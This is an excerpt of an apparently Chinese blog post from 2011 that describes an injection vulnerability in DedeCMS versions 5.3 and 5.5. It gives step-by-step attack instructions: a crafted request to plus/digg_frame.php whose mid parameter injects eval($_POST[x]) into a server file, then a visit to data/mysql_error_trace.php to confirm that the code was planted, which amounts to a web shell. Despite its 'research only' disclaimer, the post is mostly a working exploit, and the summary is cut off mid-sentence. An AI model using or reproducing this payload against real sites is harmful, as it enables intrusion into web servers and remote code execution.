dedecms注入漏洞 5.3 5.5
摘要:
dedecms5.3和5.5系列版本存在重大注入漏洞,请注意以下操作有攻击性,仅供研究.利用此漏洞进行违法活动者,后果自负.作者:张恒假设域名是:www.abc.com攻击步骤如下:1.访问网址:http://www.abc.com/plus/digg_frame.php?action=good&id=1024%651024&mid=*/eval($_POST[x]);var_dump(3);?>可看见以下错误信息2.访问 http://www.abc.com/data/mysql_error_trace.php 看到以下信息证明注入成功了.int(3) Error: I 阅读全文
posted @ 2011-05-20 10:58 小宝哥哥 阅读(19393) 评论(0) 推荐(0) 编辑
